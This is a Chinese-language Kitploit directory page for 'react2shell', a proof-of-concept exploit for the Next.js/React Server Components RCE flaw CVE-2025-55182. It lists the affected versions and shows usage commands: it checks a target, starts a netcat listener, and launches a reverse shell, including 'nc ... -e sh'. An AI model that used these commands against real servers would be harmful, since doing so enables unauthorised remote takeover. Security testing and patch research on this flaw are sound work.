Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
react2shell — React2Shell(CVE-2025-55182)的 PoC | Kitploit
工具/GitHubGitHub/xkey8/react2shell
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队远程访问工具
GitHubxkey8/react2shell

react2shell

React2Shell(CVE-2025-55182)的 PoC

查看仓库
129个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

React2Shell

针对 CVE-2025-55182 未认证远程代码执行漏洞(又名 React2Shell)的概念验证漏洞利用程序。 该脚本用于在以下 Next.js 版本及更早版本上获取 shell;

  • 15.0.4 及以下
  • 15.1.8 及以下
  • 15.2.5 及以下
  • 15.3.5 及以下
  • 15.4.7 及以下
  • 15.5.6 及以下
  • 16.0.6 及以下
  • 14.3.0-canary.77 及更高版本

它仅在 16.0.6 版本上测试过。

用法

root@kitploit:~
$ ./react2shell.py --help
d8888b. d88888b  .d8b.   .o88b. d888888b .d888b. .d8888. db   db d88888b db      db
88  `8D 88'     d8' `8b d8P  Y8 `~~88~~' VP  `8D 88'  YP 88   88 88'     88      88
88oobY' 88ooooo 88ooo88 8P         88       odD' `8bo.   88ooo88 88ooooo 88      88
88`8b   88~~~~~ 88~~~88 8b         88     .88'     `Y8b. 88~~~88 88~~~~~ 88      88
88 `88. 88.     88   88 Y8b  d8    88    j88.    db   8D 88   88 88.     88booo. 88booo.
88   YD Y88888P YP   YP  `Y88P'    YP    888888D `8888Y' YP   YP Y88888P Y88888P Y88888P

usage: react2shell [-h] -u URL -i IP -p PORT

options:
  -h, --help       show this help message and exit
  -u, --url URL    Target URL
  -i, --ip IP      Attacker IP
  -p, --port PORT  Attacker port

检查目标是否存在漏洞;

root@kitploit:~
./react2shell.py -u http://127.0.0.1:3000

启动一个监听器;

root@kitploit:~
$ nc -lvp 4444

启动一个 shell;

root@kitploit:~
$ ./react2shell.py -u http://127.0.0.1:3000 -i 127.0.0.1 -p 4444
$ ./react2shell.py -u http://127.0.0.1:3000 -c 'nc 127.0.0.1 4444 -e sh' # you can also provide a command


参考

  • https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
  • https://nvd.nist.gov/vuln/detail/CVE-2025-55182
  • https://nextjs.org/blog/CVE-2025-66478
  • https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
下载工具